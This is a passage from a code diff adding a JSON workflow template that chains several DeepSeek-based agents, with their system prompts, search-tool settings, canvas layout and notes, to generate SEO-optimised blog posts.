Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [
{
"component_name": "TavilySearch",
"name": "TavilySearch",
"params": {
"api_key": "",
"days": 7,
"exclude_domains": [],
"include_answer": false,
"include_domains": [],
"include_image_descriptions": false,
"include_images": false,
"include_raw_content": true,
"max_results": 5,
"outputs": {
"formalized_content": {
"type": "string",
"value": ""
},
"json": {
"type": "Array<Object>",
"value": []
}
},
"query": "sys.query",
"search_depth": "basic",
"topic": "general"
}
}
],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "",
"visual_files_var": ""
},
"label": "Agent",
"name": "Body Agent"
},
"dragging": false,
"id": "Agent:EagerNailsRemain",
"measured": {
"height": 84,
"width": 200
},
"position": {
"x": 889.0614605692713,
"y": 247.00973041799065
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "agentNode"
},
{
"data": {
"form": {
"description": "This is an agent for a specific task.",
"user_prompt": "This is the order you need to send to the agent."
},
"label": "Tool",
"name": "flow.tool_1"
},
"dragging": false,
"id": "Tool:WickedDeerHeal",
"measured": {
"height": 44,
"width": 200
},
"position": {
"x": 853.2006404239659,
"y": 364.37541577229143
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "toolNode"
},
{
"data": {
"form": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.5,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 5,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Precise",
"presencePenaltyEnabled": false,
"presence_penalty": 0.5,
"prompts": [
{
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
"temperature": 0.2,
"temperatureEnabled": true,
"tools": [],
"topPEnabled": false,
"top_p": 0.75,
"user_prompt": "",
"visual_files_var": ""
},
"label": "Agent",
"name": "Editor Agent"
},
"dragging": false,
"id": "Agent:LovelyHeadsOwn",
"measured": {
"height": 84,
"width": 200
},
"position": {
"x": 1160.3332919804993,
"y": 149.50806732882472
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "agentNode"
},
{
"data": {
"form": {
"content": [
"{Agent:LovelyHeadsOwn@content}"
]
},
"label": "Message",
"name": "Response"
},
"dragging": false,
"id": "Message:LegalBeansBet",
"measured": {
"height": 56,
"width": 200
},
"position": {
"x": 1370.6665839609984,
"y": 267.0323933738015
},
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "messageNode"
},
{
"data": {
"form": {
"text": "This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don\u2019t need any writing experience. Just provide a topic or short request \u2014 the system will handle the rest.\n\nThe process includes the following key stages:\n\n1. **Understanding your topic and goals**\n2. **Designing the blog structure**\n3. **Writing high-quality content**\n\n\n"
},
"label": "Note",
"name": "Workflow Overall Description"
},
"dragHandle": ".note-drag-handle",
"dragging": false,
"height": 205,
"id": "Note:SlimyGhostsWear",
"measured": {
"height": 205,
"width": 415
},
"position": {
"x": -284.3143151688742,
"y": 150.47632147913419
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 415
},
{
"data": {
"form": {
"text": "**Purpose**: \nThis agent reads the user\u2019s input and figures out what kind of blog needs to be written.\n\n**What it does**:\n- Understands the main topic you want to write about \n- Identifies who the blog is for (e.g., beginners, marketers, developers) \n- Determines the writing purpose (e.g., SEO traffic, product promotion, education) \n- Suggests 3\u20135 long-tail SEO keywords related to the topic"
},
"label": "Note",
"name": "Parse And Keyword Agent"
},
"dragHandle": ".note-drag-handle",
"dragging": false,
"height": 152,
"id": "Note:EmptyChairsShake",
"measured": {
"height": 152,
"width": 340
},
"position": {
"x": 295.04147626768133,
"y": 372.2755718118446
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 340
},
{
"data": {
"form": {
"text": "**Purpose**: \nThis agent builds the blog structure \u2014 just like writing a table of contents before you start writing the full article.\n\n**What it does**:\n- Suggests a clear blog title that includes important keywords \n- Breaks the article into sections using H2 and H3 headings (like a professional blog layout) \n- Assigns 1\u20132 recommended keywords to each section to help with SEO \n- Follows the writing goal and target audience set in the previous step"
},
"label": "Note",
"name": "Outline Agent"
},
"dragHandle": ".note-drag-handle",
"dragging": false,
"height": 146,
"id": "Note:TallMelonsNotice",
"measured": {
"height": 146,
"width": 343
},
"position": {
"x": 598.5644991893463,
"y": 5.801054564756448
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 343
},
{
"data": {
"form": {
"text": "**Purpose**: \nThis agent is responsible for writing the actual content of the blog \u2014 paragraph by paragraph \u2014 based on the outline created earlier.\n\n**What it does**:\n- Looks at each H2/H3 section in the outline \n- Writes 150\u2013220 words of clear, helpful, and well-structured content per section \n- Includes the suggested SEO keywords naturally (not keyword stuffing) \n- Uses real examples or facts if needed (by calling a web search tool like Tavily)"
},
"label": "Note",
"name": "Body Agent"
},
"dragHandle": ".note-drag-handle",
"dragging": false,
"height": 137,
"id": "Note:RipeCougarsBuild",
"measured": {
"height": 137,
"width": 319
},
"position": {
"x": 860.4854129814981,
"y": 427.2196835690842
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 319
},
{
"data": {
"form": {
"text": "**Purpose**: \nThis agent reviews the entire blog draft to make sure it is smooth, professional, and SEO-friendly. It acts like a human editor before publishing.\n\n**What it does**:\n- Polishes the writing: improves sentence clarity, fixes awkward phrasing \n- Makes sure the content flows well from one section to the next \n- Double-checks keyword usage: are they present, natural, and not overused? \n- Verifies the blog structure (H1, H2, H3 headings) is correct \n- Adds two key SEO elements:\n - **Meta Title** (shows up in search results)\n - **Meta Description** (summary for Google and social sharing)"
},
"label": "Note",
"name": "Editor Agent"
},
"dragHandle": ".note-drag-handle",
"height": 146,
"id": "Note:OpenTurkeysSell",
"measured": {
"height": 146,
"width": 320
},
"position": {
"x": 1129,
"y": -30
},
"resizing": false,
"selected": false,
"sourcePosition": "right",
"targetPosition": "left",
"type": "noteNode",
"width": 320
}
]
},
"history": [],
"messages": [],
"path": [],
"retrieval": []
},
"avatar": "data:image/jpeg;base64,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"
}
agent/templates/seo_blog.json (new file, 915 lines)
@@ -0,0 +1,915 @@
{
"id": 4,
"title": "Generate SEO Blog",
"description": "This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don’t need any writing experience. Just provide a topic or short request — the system will handle the rest.",
"canvas_type": "Recommended",
"dsl": {
"components": {
"Agent:BetterSitesSend": {
"downstream": [
"Agent:EagerNailsRemain"
],
"obj": {
"component_name": "Agent",
"params": {
"delay_after_error": 1,
"description": "",
"exception_comment": "",
"exception_default_value": "",
"exception_goto": [],
"exception_method": null,
"frequencyPenaltyEnabled": false,
"frequency_penalty": 0.3,
"llm_id": "deepseek-chat@DeepSeek",
"maxTokensEnabled": false,
"max_retries": 3,
"max_rounds": 3,
"max_tokens": 4096,
"mcp": [],
"message_history_window_size": 12,
"outputs": {
"content": {
"type": "string",
"value": ""
}
},
"parameter": "Balance",
"presencePenaltyEnabled": false,
"presence_penalty": 0.2,
"prompts": [
{
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
"role": "user"
}
],
"sys_prompt": "# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
|
||||||
|
"temperature": 0.5,
|
||||||
|
"temperatureEnabled": true,
|
||||||
|
"tools": [
|
||||||
|
{
|
||||||
|
"component_name": "TavilySearch",
|
||||||
|
"name": "TavilySearch",
|
||||||
|
"params": {
|
||||||
|
"api_key": "",
|
||||||
|
"days": 7,
|
||||||
|
"exclude_domains": [],
|
||||||
|
"include_answer": false,
|
||||||
|
"include_domains": [],
|
||||||
|
"include_image_descriptions": false,
|
||||||
|
"include_images": false,
|
||||||
|
"include_raw_content": true,
|
||||||
|
"max_results": 5,
|
||||||
|
"outputs": {
|
||||||
|
"formalized_content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
},
|
||||||
|
"json": {
|
||||||
|
"type": "Array<Object>",
|
||||||
|
"value": []
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"query": "sys.query",
|
||||||
|
"search_depth": "basic",
|
||||||
|
"topic": "general"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"topPEnabled": false,
|
||||||
|
"top_p": 0.85,
|
||||||
|
"user_prompt": "",
|
||||||
|
"visual_files_var": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"upstream": [
|
||||||
|
"Agent:ClearRabbitsScream"
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"Agent:ClearRabbitsScream": {
|
||||||
|
"downstream": [
|
||||||
|
"Agent:BetterSitesSend"
|
||||||
|
],
|
||||||
|
"obj": {
|
||||||
|
"component_name": "Agent",
|
||||||
|
"params": {
|
||||||
|
"delay_after_error": 1,
|
||||||
|
"description": "",
|
||||||
|
"exception_comment": "",
|
||||||
|
"exception_default_value": "",
|
||||||
|
"exception_goto": [],
|
||||||
|
"exception_method": null,
|
||||||
|
"frequencyPenaltyEnabled": false,
|
||||||
|
"frequency_penalty": 0.5,
|
||||||
|
"llm_id": "deepseek-chat@DeepSeek",
|
||||||
|
"maxTokensEnabled": false,
|
||||||
|
"max_retries": 3,
|
||||||
|
"max_rounds": 1,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"mcp": [],
|
||||||
|
"message_history_window_size": 12,
|
||||||
|
"outputs": {
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"parameter": "Precise",
|
||||||
|
"presencePenaltyEnabled": false,
|
||||||
|
"presence_penalty": 0.5,
|
||||||
|
"prompts": [
|
||||||
|
{
|
||||||
|
"content": "The user query is {sys.query}",
|
||||||
|
"role": "user"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"sys_prompt": "# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
|
||||||
|
"temperature": 0.2,
|
||||||
|
"temperatureEnabled": true,
|
||||||
|
"tools": [],
|
||||||
|
"topPEnabled": false,
|
||||||
|
"top_p": 0.75,
|
||||||
|
"user_prompt": "",
|
||||||
|
"visual_files_var": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"upstream": [
|
||||||
|
"begin"
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"Agent:EagerNailsRemain": {
|
||||||
|
"downstream": [
|
||||||
|
"Agent:LovelyHeadsOwn"
|
||||||
|
],
|
||||||
|
"obj": {
|
||||||
|
"component_name": "Agent",
|
||||||
|
"params": {
|
||||||
|
"delay_after_error": 1,
|
||||||
|
"description": "",
|
||||||
|
"exception_comment": "",
|
||||||
|
"exception_default_value": "",
|
||||||
|
"exception_goto": [],
|
||||||
|
"exception_method": null,
|
||||||
|
"frequencyPenaltyEnabled": false,
|
||||||
|
"frequency_penalty": 0.5,
|
||||||
|
"llm_id": "deepseek-chat@DeepSeek",
|
||||||
|
"maxTokensEnabled": false,
|
||||||
|
"max_retries": 3,
|
||||||
|
"max_rounds": 5,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"mcp": [],
|
||||||
|
"message_history_window_size": 12,
|
||||||
|
"outputs": {
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"parameter": "Precise",
|
||||||
|
"presencePenaltyEnabled": false,
|
||||||
|
"presence_penalty": 0.5,
|
||||||
|
"prompts": [
|
||||||
|
{
|
||||||
|
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}",
|
||||||
|
"role": "user"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"sys_prompt": "# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
|
||||||
|
"temperature": 0.2,
|
||||||
|
"temperatureEnabled": true,
|
||||||
|
"tools": [
|
||||||
|
{
|
||||||
|
"component_name": "TavilySearch",
|
||||||
|
"name": "TavilySearch",
|
||||||
|
"params": {
|
||||||
|
"api_key": "",
|
||||||
|
"days": 7,
|
||||||
|
"exclude_domains": [],
|
||||||
|
"include_answer": false,
|
||||||
|
"include_domains": [],
|
||||||
|
"include_image_descriptions": false,
|
||||||
|
"include_images": false,
|
||||||
|
"include_raw_content": true,
|
||||||
|
"max_results": 5,
|
||||||
|
"outputs": {
|
||||||
|
"formalized_content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
},
|
||||||
|
"json": {
|
||||||
|
"type": "Array<Object>",
|
||||||
|
"value": []
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"query": "sys.query",
|
||||||
|
"search_depth": "basic",
|
||||||
|
"topic": "general"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"topPEnabled": false,
|
||||||
|
"top_p": 0.75,
|
||||||
|
"user_prompt": "",
|
||||||
|
"visual_files_var": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"upstream": [
|
||||||
|
"Agent:BetterSitesSend"
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"Agent:LovelyHeadsOwn": {
|
||||||
|
"downstream": [
|
||||||
|
"Message:LegalBeansBet"
|
||||||
|
],
|
||||||
|
"obj": {
|
||||||
|
"component_name": "Agent",
|
||||||
|
"params": {
|
||||||
|
"delay_after_error": 1,
|
||||||
|
"description": "",
|
||||||
|
"exception_comment": "",
|
||||||
|
"exception_default_value": "",
|
||||||
|
"exception_goto": [],
|
||||||
|
"exception_method": null,
|
||||||
|
"frequencyPenaltyEnabled": false,
|
||||||
|
"frequency_penalty": 0.5,
|
||||||
|
"llm_id": "deepseek-chat@DeepSeek",
|
||||||
|
"maxTokensEnabled": false,
|
||||||
|
"max_retries": 3,
|
||||||
|
"max_rounds": 5,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"mcp": [],
|
||||||
|
"message_history_window_size": 12,
|
||||||
|
"outputs": {
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"parameter": "Precise",
|
||||||
|
"presencePenaltyEnabled": false,
|
||||||
|
"presence_penalty": 0.5,
|
||||||
|
"prompts": [
|
||||||
|
{
|
||||||
|
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
|
||||||
|
"role": "user"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"sys_prompt": "# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
|
||||||
|
"temperature": 0.2,
|
||||||
|
"temperatureEnabled": true,
|
||||||
|
"tools": [],
|
||||||
|
"topPEnabled": false,
|
||||||
|
"top_p": 0.75,
|
||||||
|
"user_prompt": "",
|
||||||
|
"visual_files_var": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"upstream": [
|
||||||
|
"Agent:EagerNailsRemain"
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"Message:LegalBeansBet": {
|
||||||
|
"downstream": [],
|
||||||
|
"obj": {
|
||||||
|
"component_name": "Message",
|
||||||
|
"params": {
|
||||||
|
"content": [
|
||||||
|
"{Agent:LovelyHeadsOwn@content}"
|
||||||
|
]
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"upstream": [
|
||||||
|
